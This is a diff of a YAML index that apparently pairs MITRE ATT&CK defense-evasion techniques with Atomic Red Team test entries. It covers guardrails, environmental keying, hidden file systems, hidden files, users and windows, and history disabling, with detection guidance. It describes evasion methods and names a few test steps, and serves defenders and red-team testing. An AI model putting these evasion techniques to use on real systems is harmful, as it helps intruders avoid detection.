+ - source_name: FireEye Outlook Dec 2019
+ url: https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html
+ description: 'McWhirt, M., Carr, N., Bienstock, D. (2019, December 4). Breaking
+ the Rules: A Tough Outlook for Home Page Attacks (CVE-2017-11774). Retrieved
+ June 23, 2020.'
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Execution Guardrails
- description: "Execution guardrails constrain execution or actions based on adversary
- supplied environment specific conditions that are expected to be present on
- the target. \n\nGuardrails ensure that a payload only executes against an
- intended target and reduces collateral damage from an adversary’s campaign.(Citation:
- FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target
- system or environment to use as guardrails may include specific network share
- names, attached physical devices, files, joined Active Directory (AD) domains,
- and local/external IP addresses.\n\nEnvironmental keying is one type of guardrail
- that includes cryptographic techniques for deriving encryption/decryption
- keys from specific types of values in a given computing environment.(Citation:
- EK Clueless Agents) Values can be derived from target-specific elements and
- used to generate a decryption key for an encrypted payload. Target-specific
- values can be derived from specific network shares, physical devices, software/software
- versions, files, joined AD domains, system time, and local/external IP addresses.(Citation:
- Kaspersky Gauss Whitepaper)(Citation: Proofpoint Router Malvertising)(Citation:
- EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation:
- Ebowla: Genetic Malware) By generating the decryption keys from target-specific
- environmental values, environmental keying can make sandbox detection, anti-virus
- detection, crowdsourcing of information, and reverse engineering difficult.(Citation:
- Kaspersky Gauss Whitepaper)(Citation: Ebowla: Genetic Malware) These difficulties
- can slow down the incident response process and help adversaries hide their
- tactics, techniques, and procedures (TTPs).\n\nSimilar to [Obfuscated Files
- or Information](https://attack.mitre.org/techniques/T1027), adversaries may
- use guardrails and environmental keying to help protect their TTPs and evade
- detection. For example, environmental keying may be used to deliver an encrypted
- payload to the target that will use target-specific values to decrypt the
- payload before execution.(Citation: Kaspersky Gauss Whitepaper)(Citation:
- EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation:
- Ebowla: Genetic Malware)(Citation: Demiguise Guardrail Router Logo) By utilizing
- target-specific values to decrypt the payload the adversary can avoid packaging
- the decryption key with the payload or sending it over a potentially monitored
- network connection. Depending on the technique for gathering target-specific
- values, reverse engineering of the encrypted payload can be exceptionally
- difficult.(Citation: Kaspersky Gauss Whitepaper) In general, guardrails can
- be used to prevent exposure of capabilities in environments that are not intended
- to be compromised or operated within. This use of guardrails is distinct from
- typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)
- where a decision can be made not to further engage because the value conditions
- specified by the adversary are meant to be target specific and not such that
- they could occur in any environment."
+ description: |-
+ Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)
+
+ Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.
id: attack-pattern--853c4192-4311-43e1-bfbb-b11b14911852
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2019-07-19T14:59:44.034Z'
+ modified: '2020-06-24T18:52:12.956Z'
created: '2019-01-31T02:10:08.261Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_contributors:
- - Nick Carr, FireEye
- x_mitre_data_sources:
- - Process monitoring
- x_mitre_detection: Detecting the action of environmental keying may be difficult
- depending on the implementation. Monitoring for suspicious processes being
- spawned that gather a variety of system information or perform other forms
- of [Discovery](https://attack.mitre.org/tactics/TA0007), especially in a short
- period of time, may aid in detection.
- x_mitre_permissions_required:
- - User
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '1.1'
x_mitre_defense_bypassed:
- Anti-virus
- Host forensic analysis
- Signature-based detection
- - Static File Analysis
- x_mitre_version: '1.0'
+ - Static file analysis
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: Detecting the use of guardrails may be difficult depending
+ on the implementation. Monitoring for suspicious processes being spawned that
+ gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007),
+ especially in a short period of time, may aid in detection.
+ x_mitre_data_sources:
+ - Process monitoring
+ x_mitre_contributors:
+ - Nick Carr, FireEye
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1211:
technique:
@@ -23450,16 +24135,13 @@ defense-evasion:
phase_name: defense-evasion
modified: '2020-03-29T20:00:46.900Z'
created: '2018-04-18T17:59:24.739Z'
- x_mitre_version: '1.1'
- x_mitre_contributors:
- - John Lambert, Microsoft Threat Intelligence Center
- x_mitre_data_sources:
- - Windows Error Reporting
- - Process monitoring
- - File monitoring
- x_mitre_defense_bypassed:
- - Anti-virus
- - System access controls
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: Exploitation for defense evasion may happen shortly after
the system has been compromised to prevent detection during later actions
for for additional tools that may be brought in and used. Detecting software
@@ -23469,13 +24151,16 @@ defense-evasion:
compromise, such as abnormal behavior of processes. This could include suspicious
files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055)
for attempts to hide execution or evidence of Discovery.
- x_mitre_permissions_required:
- - User
- x_mitre_platforms:
- - Linux
- - Windows
- - macOS
- x_mitre_is_subtechnique: false
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - System access controls
+ x_mitre_data_sources:
+ - Windows Error Reporting
+ - Process monitoring
+ - File monitoring
+ x_mitre_contributors:
+ - John Lambert, Microsoft Threat Intelligence Center
+ x_mitre_version: '1.1'
atomic_tests: []
T1055.011:
technique:
@@ -23554,31 +24239,31 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-03-26T20:38:26.296Z'
+ modified: '2020-06-20T22:26:33.191Z'
created: '2020-01-14T17:18:32.126Z'
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_data_sources:
- - Process monitoring
- - API monitoring
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Application control
x_mitre_detection: 'Monitor for API calls related to enumerating and manipulating
EWM such as GetWindowLong (Citation: Microsoft GetWindowLong function) and
SetWindowLong (Citation: Microsoft SetWindowLong function). Malware associated
with this technique have also used SendNotifyMessage (Citation: Microsoft
SendNotifyMessage function) to trigger the associated window procedure and
eventual malicious injection. (Citation: Endgame Process Injection July 2017)'
- x_mitre_defense_bypassed:
- - Anti-virus
- - Process whitelisting
+ x_mitre_data_sources:
+ - Process monitoring
+ - API monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
- T1551.004:
+ T1070.004:
technique:
external_references:
- source_name: mitre-attack
- external_id: T1551.004
- url: https://attack.mitre.org/techniques/T1551/004
+ external_id: T1070.004
+ url: https://attack.mitre.org/techniques/T1070/004
- url: http://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/
description: 'Wilhoit, K. (2013, March 4). In-Depth Look: APT Attack Tools
of the Trade. Retrieved December 2, 2015.'
@@ -23598,14 +24283,14 @@ defense-evasion:
phase_name: defense-evasion
modified: '2020-03-29T21:34:16.209Z'
created: '2020-01-31T12:35:36.479Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - Binary file metadata
- - Process command-line parameters
- - File monitoring
+ x_mitre_contributors:
+ - Walker Johnson
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ x_mitre_defense_bypassed:
+ - Host forensic analysis
x_mitre_detection: It may be uncommon for events related to benign command-line
functions such as DEL or third-party utilities or tools to be found in an
environment, depending on the user base and how systems are typically used.
@@ -23616,15 +24301,15 @@ defense-evasion:
network that an adversary could introduce. Some monitoring tools may collect
command-line arguments, but may not capture DEL commands since DEL is a native
function within cmd.exe.
- x_mitre_defense_bypassed:
- - Host forensic analysis
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Walker Johnson
- identifier: T1551.004
+ x_mitre_data_sources:
+ - Binary file metadata
+ - Process command-line parameters
+ - File monitoring
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ identifier: T1070.004
atomic_tests:
- name: Delete a single file - Linux/macOS
auto_generated_guid: 562d737f-2fc6-4b09-8c2a-7f8ff0828480
@@ -23837,8 +24522,19 @@ defense-evasion:
name: powershell
T1222:
technique:
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created: '2018-10-17T00:14:20.652Z'
+ modified: '2020-03-29T23:12:40.212Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ type: attack-pattern
+ id: attack-pattern--65917ae0-b854-4139-83fe-bf2441cf0196
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: File and Directory Permissions Modification
+ description: |-
+ Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
+
+ Modifications may include changing specific access rights, which may require taking ownership of a file or directory and/or elevated permissions depending on the file or directory’s existing permissions. This may enable malicious activity such as modifying, replacing, or deleting specific files or directories. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), [.bash_profile and .bashrc](https://attack.mitre.org/techniques/T1546/004), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).
external_references:
- source_name: mitre-attack
external_id: T1222
@@ -23855,19 +24551,8 @@ defense-evasion:
description: Netsurion. (2014, February 19). Monitoring File Permission Changes
with the Windows Security Log. Retrieved August 19, 2018.
source_name: EventTracker File Permissions Feb 2014
- description: |-
- Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
-
- Modifications may include changing specific access rights, which may require taking ownership of a file or directory and/or elevated permissions depending on the file or directory’s existing permissions. This may enable malicious activity such as modifying, replacing, or deleting specific files or directories. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), [.bash_profile and .bashrc](https://attack.mitre.org/techniques/T1546/004), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).
- name: File and Directory Permissions Modification
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- id: attack-pattern--65917ae0-b854-4139-83fe-bf2441cf0196
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- modified: '2020-03-29T23:12:40.212Z'
- created: '2018-10-17T00:14:20.652Z'
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_is_subtechnique: false
x_mitre_permissions_required:
- User
@@ -23948,16 +24633,13 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-02-05T16:16:08.471Z'
+ modified: '2020-06-20T22:41:20.063Z'
created: '2020-02-05T16:16:08.471Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_defense_bypassed:
- - Application whitelisting
- - Anti-virus
- x_mitre_permissions_required:
- - User
- - Administrator
+ x_mitre_platforms:
+ - macOS
+ x_mitre_data_sources:
+ - File monitoring
+ - Process command-line parameters
x_mitre_detection: Monitoring for the removal of the com.apple.quarantine
flag by a user instead of the operating system is a suspicious action and
should be examined further. Monitor and investigate attempts to modify extended
@@ -23965,11 +24647,14 @@ defense-evasion:
utilities may generate high false positive alerts, so compare against baseline
knowledge for how systems are typically used and correlate modification events
with other indications of malicious activity where possible.
- x_mitre_data_sources:
- - File monitoring
- - Process command-line parameters
- x_mitre_platforms:
- - macOS
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ x_mitre_defense_bypassed:
+ - Application control
+ - Anti-virus
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
identifier: T1553.001
atomic_tests:
- name: Gatekeeper Bypass
@@ -24067,17 +24752,10 @@ defense-evasion:
phase_name: privilege-escalation
modified: '2020-03-26T21:17:41.231Z'
created: '2019-03-07T14:10:32.650Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - Itamar Mizrahi, Cymptom
- - Tristan Bennett, Seamless Intelligence
- x_mitre_data_sources:
- - Windows event logs
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_version: '1.1'
+ x_mitre_is_subtechnique: false
+ x_mitre_defense_bypassed:
+ - System access controls
+ - File system access controls
x_mitre_detection: "It is possible to detect GPO modifications by monitoring
directory service changes using Windows event logs. Several events may be
logged for such GPO modifications, including:\n\n* Event ID 5136 - A directory
@@ -24090,10 +24768,17 @@ defense-evasion:
value modifications, like those to SeEnableDelegationPrivilege, can also be
searched for in events associated with privileges assigned to new logons (Event
ID 4672) and assignment of user rights (Event ID 4704). "
- x_mitre_defense_bypassed:
- - System access controls
- - File system access controls
- x_mitre_is_subtechnique: false
+ x_mitre_version: '1.1'
+ x_mitre_permissions_required:
+ - Administrator
+ - User
+ x_mitre_data_sources:
+ - Windows event logs
+ x_mitre_contributors:
+ - Itamar Mizrahi, Cymptom
+ - Tristan Bennett, Seamless Intelligence
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1562.003:
technique:
@@ -24121,25 +24806,25 @@ defense-evasion:
phase_name: defense-evasion
modified: '2020-03-29T22:09:18.020Z'
created: '2020-02-21T20:56:06.498Z'
- x_mitre_platforms:
- - Linux
- - macOS
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ x_mitre_defense_bypassed:
+ - Host forensic analysis
+ - Log analysis
+ x_mitre_detection: Correlating a user session with a distinct lack of new commands
+ in their .bash_history can be a clue to suspicious behavior.
+ Additionally, users checking or changing their HISTCONTROL environment
+ variable is also suspicious.
x_mitre_data_sources:
- Environment variable
- File monitoring
- Authentication logs
- Process monitoring
- x_mitre_detection: Correlating a user session with a distinct lack of new commands
- in their .bash_history can be a clue to suspicious behavior.
- Additionally, users checking or changing their HISTCONTROL environment
- variable is also suspicious.
- x_mitre_defense_bypassed:
- - Host forensic analysis
- - Log analysis
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_platforms:
+ - Linux
+ - macOS
identifier: T1562.003
atomic_tests:
- name: Disable history collection
@@ -24173,8 +24858,86 @@ defense-evasion:
3. ls
4. whoami > recon.txt
name: manual
+ T1564.005:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1564.005
+ url: https://attack.mitre.org/techniques/T1564/005
+ - source_name: MalwareTech VFS Nov 2014
+ url: https://www.malwaretech.com/2014/11/virtual-file-systems-for-beginners.html
+ description: Hutchins, M. (2014, November 28). Virtual File Systems for Beginners.
+ Retrieved June 22, 2020.
+ - url: https://www.fireeye.com/blog/threat-research/2015/12/fin1-targets-boot-record.html
+ description: 'Andonov, D., et al. (2015, December 7). Thriving Beyond The
+ Operating System: Financial Threat Group Targets Volume Boot Record. Retrieved
+ May 13, 2016.'
+ source_name: FireEye Bootkits
+ - source_name: ESET ComRAT May 2020
+ url: https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf
+ description: 'Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year
+ journey. Retrieved June 15, 2020.'
+ - source_name: Kaspersky Equation QA
+ description: 'Kaspersky Lab''s Global Research and Analysis Team. (2015, February).
+ Equation Group: Questions and Answers. Retrieved December 21, 2015.'
+ url: https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064459/Equation_group_questions_and_answers.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Hidden File System
+ description: |-
+ Adversaries may use a hidden file system to conceal malicious activity from users and security tools. File systems provide a structure to store and access data from physical storage. Typically, a user engages with a file system through applications that allow them to access files and directories, which are an abstraction from their physical location (ex: disk sector). Standard file systems include FAT, NTFS, ext4, and APFS. File systems can also contain other structures, such as the Volume Boot Record (VBR) and Master File Table (MFT) in NTFS.(Citation: MalwareTech VFS Nov 2014)
+
+ Adversaries may use their own abstracted file system, separate from the standard file system present on the infected system. In doing so, adversaries can hide the presence of malicious components and file input/output from security tools. Hidden file systems, sometimes referred to as virtual file systems, can be implemented in numerous ways. One implementation would be to store a file system in reserved disk space unused by disk structures or standard file system partitions.(Citation: MalwareTech VFS Nov 2014)(Citation: FireEye Bootkits) Another implementation could be for an adversary to drop their own portable partition image as a file on top of the standard file system.(Citation: ESET ComRAT May 2020) Adversaries may also fragment files across the existing file system structure in non-standard ways.(Citation: Kaspersky Equation QA)
+ id: attack-pattern--dfebc3b7-d19d-450b-81c7-6dafe4184c04
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ modified: '2020-06-29T15:12:11.024Z'
+ created: '2020-06-28T22:55:55.719Z'
+ x_mitre_data_sources:
+ - File monitoring
+ - Windows Registry
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ x_mitre_detection: Detecting the use of a hidden file system may be exceptionally
+ difficult depending on the implementation. Emphasis may be placed on detecting
+ related aspects of the adversary lifecycle, such as how malware interacts
+ with the hidden file system or how a hidden file system is loaded. Consider
+ looking for anomalous interactions with the Registry or with a particular
+ file on disk. Likewise, if the hidden file system is loaded on boot from reserved
+ disk space, consider shifting focus to detecting [Bootkit](https://attack.mitre.org/techniques/T1542/003)
+ activity.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ atomic_tests: []
T1564.001:
technique:
+ created: '2020-02-26T17:46:13.128Z'
+ modified: '2020-03-29T22:32:25.985Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ type: attack-pattern
+ id: attack-pattern--ec8fc7e2-b356-455c-8db5-2e37be158e7d
+ description: |-
+ Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (dir /a for Windows and ls –a for Linux and macOS).
+
+ On Linux and Mac, users can mark specific files as hidden simply by putting a “.” as the first character in the file or folder name (Citation: Sofacy Komplex Trojan) (Citation: Antiquated Mac Malware). Files and folders that start with a period, ‘.’, are by default hidden from being viewed in the Finder application and standard command-line utilities like “ls”. Users must specifically change settings to have these files viewable.
+
+ Files on macOS can also be marked with the UF_HIDDEN flag which prevents them from being seen in Finder.app, but still allows them to be seen in Terminal.app (Citation: WireLurker). On Windows, users can mark specific files as hidden by using the attrib.exe binary. Many applications create these hidden files and folders to store information so that it doesn’t clutter up the user’s workspace. For example, SSH utilities create a .ssh folder that’s hidden and contains the user’s known hosts and keys.
+
+ Adversaries can use this to their advantage to hide files and folders anywhere on the system and evading a typical user or system analysis that does not incorporate investigation of hidden files.
+ name: Hidden Files and Directories
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1564.001
@@ -24191,25 +24954,6 @@ defense-evasion:
description: 'Claud Xiao. (n.d.). WireLurker: A New Era in iOS and OS X Malware.
Retrieved July 10, 2017.'
source_name: WireLurker
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Hidden Files and Directories
- description: |-
- Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (dir /a for Windows and ls –a for Linux and macOS).
-
- On Linux and Mac, users can mark specific files as hidden simply by putting a “.” as the first character in the file or folder name (Citation: Sofacy Komplex Trojan) (Citation: Antiquated Mac Malware). Files and folders that start with a period, ‘.’, are by default hidden from being viewed in the Finder application and standard command-line utilities like “ls”. Users must specifically change settings to have these files viewable.
-
- Files on macOS can also be marked with the UF_HIDDEN flag which prevents them from being seen in Finder.app, but still allows them to be seen in Terminal.app (Citation: WireLurker). On Windows, users can mark specific files as hidden by using the attrib.exe binary. Many applications create these hidden files and folders to store information so that it doesn’t clutter up the user’s workspace. For example, SSH utilities create a .ssh folder that’s hidden and contains the user’s known hosts and keys.
-
- Adversaries can use this to their advantage to hide files and folders anywhere on the system and evading a typical user or system analysis that does not incorporate investigation of hidden files.
- id: attack-pattern--ec8fc7e2-b356-455c-8db5-2e37be158e7d
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- modified: '2020-03-29T22:32:25.985Z'
- created: '2020-02-26T17:46:13.128Z'
x_mitre_platforms:
- Windows
- macOS
@@ -24382,19 +25126,19 @@ defense-evasion:
phase_name: defense-evasion
modified: '2020-03-29T22:36:25.994Z'
created: '2020-03-13T20:12:40.876Z'
- x_mitre_platforms:
- - macOS
- x_mitre_detection: This technique prevents the new user from showing up at the
- log in screen, but all of the other signs of a new user still exist. The user
- still gets a home directory and will appear in the authentication logs.
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_permissions_required:
- - root
- - Administrator
x_mitre_data_sources:
- File monitoring
- Authentication logs
+ x_mitre_permissions_required:
+ - root
+ - Administrator
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_detection: This technique prevents the new user from showing up at the
+ log in screen, but all of the other signs of a new user still exist. The user
+ still gets a home directory and will appear in the authentication logs.
+ x_mitre_platforms:
+ - macOS
identifier: T1564.002
atomic_tests:
- name: Hidden Users
@@ -24442,8 +25186,8 @@ defense-evasion:
may be utilized by system administrators to avoid disrupting user work environments
when carrying out administrative tasks. \n\nOn Windows, there are a variety
of features in scripting languages in Windows, such as [PowerShell](https://attack.mitre.org/techniques/T1059/001),
- Jscript, and [VBScript](https://attack.mitre.org/techniques/T1059/005) to
- make windows hidden. One example of this is powershell.exe -WindowStyle
+ Jscript, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005)
+ to make windows hidden. One example of this is powershell.exe -WindowStyle
Hidden. (Citation: PowerShell About 2019)\n\nSimilarly, on macOS the
configurations for how applications run are listed in property list (plist)
files. One of the tags in these files can be apple.awt.UIElement,
@@ -24460,26 +25204,26 @@ defense-evasion:
phase_name: defense-evasion
modified: '2020-03-29T22:49:43.557Z'
created: '2020-03-13T20:26:49.433Z'
- x_mitre_platforms:
- - macOS
- - Windows
- x_mitre_data_sources:
- - File monitoring
- - Process monitoring
- - Process command-line parameters
- - PowerShell logs
+ x_mitre_contributors:
+ - Travis Smith, Tripwire
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: Monitor processes and command-line arguments for actions
indicative of hidden windows. In Windows, enable and configure event logging
and PowerShell logging to check for the hidden window style. In MacOS, plist
files are ASCII text files with a specific format, so they're relatively easy
to parse. File monitoring can check for the apple.awt.UIElement
or any other suspicious plist tag in plist files and flag them.
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Travis Smith, Tripwire
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
+ - Process command-line parameters
+ - PowerShell logs
+ x_mitre_platforms:
+ - macOS
+ - Windows
identifier: T1564.003
atomic_tests:
- name: Hidden Window
@@ -24501,27 +25245,40 @@ defense-evasion:
name: powershell
T1564:
technique:
+ id: attack-pattern--22905430-4901-4c2a-84f6-98243cb173f8
+ description: |-
+ Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.(Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX Pirrit)(Citation: MalwareBytes ADS July 2015)
+
+ Adversaries may also attempt to hide artifacts associated with malicious behavior by creating computing regions that are isolated from common security instrumentation, such as through the use of virtualization technology.(Citation: Sophos Ragnar May 2020)
+ name: Hide Artifacts
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1564
url: https://attack.mitre.org/techniques/T1564
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Hide Artifacts
- description: "Adversaries may attempt to hide artifacts associated with their
- behaviors to evade detection. Operating systems may have features to hide
- various artifacts, such as important system files and administrative task
- execution, to avoid disrupting user work environments and prevent users from
- changing files or features on the system. \n\nAdversaries may abuse these
- features to hide artifacts such as files, directories, user accounts, or other
- system activity to evade detection. "
- id: attack-pattern--22905430-4901-4c2a-84f6-98243cb173f8
+ - url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/
+ description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26).
+ Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.
+ source_name: Sofacy Komplex Trojan
+ - url: https://www2.cybereason.com/research-osx-pirrit-mac-os-x-secuirty
+ description: Amit Serper. (2016). Cybereason Lab Analysis OSX.Pirrit. Retrieved
+ July 8, 2017.
+ source_name: Cybereason OSX Pirrit
+ - url: https://blog.malwarebytes.com/101/2015/07/introduction-to-alternate-data-streams/
+ description: Arntz, P. (2015, July 22). Introduction to Alternate Data Streams.
+ Retrieved March 21, 2018.
+ source_name: MalwareBytes ADS July 2015
+ - source_name: Sophos Ragnar May 2020
+ url: https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/
+ description: SophosLabs. (2020, May 21). Ragnar Locker ransomware deploys
+ virtual machine to dodge security. Retrieved June 29, 2020.
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-29T22:49:43.726Z'
+ modified: '2020-07-06T19:03:40.511Z'
created: '2020-02-26T17:41:25.933Z'
x_mitre_platforms:
- Linux
@@ -24529,10 +25286,10 @@ defense-evasion:
- Windows
x_mitre_is_subtechnique: false
x_mitre_version: '1.0'
- x_mitre_detection: 'Monitor files, processes, and command-line arguments for
+ x_mitre_detection: Monitor files, processes, and command-line arguments for
actions indicative of hidden artifacts. Monitor event and authentication logs
for records of hidden artifacts being used. Monitor the file system and shell
- commands for hidden attribute usage. '
+ commands for hidden attribute usage.
x_mitre_data_sources:
- API monitoring
- PowerShell logs
@@ -24556,7 +25313,7 @@ defense-evasion:
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Hijack Execution Flow
description: |-
- Adversaries may execute their own malicious payloads by hijacking the way operating systems run programs. Hijacking execution flow can be for the purposes of persistence, since this hijacked execution may reoccur over time. Adversaries may also use these mechanisms to elevate privileges or evade defenses, such as whitelisting or other restrictions on execution.
+ Adversaries may execute their own malicious payloads by hijacking the way operating systems run programs. Hijacking execution flow can be for the purposes of persistence, since this hijacked execution may reoccur over time. Adversaries may also use these mechanisms to elevate privileges or evade defenses, such as application control or other restrictions on execution.
There are many ways an adversary may hijack the flow of execution, including by manipulating how the operating system locates programs to be executed. How the operating system locates libraries to be used by a program can also be intercepted. Locations where the operating system looks for programs/resources, such as file directories and in the case of Windows the Registry, could also be poisoned to include malicious payloads.
id: attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6
@@ -24568,17 +25325,15 @@ defense-evasion:
phase_name: privilege-escalation
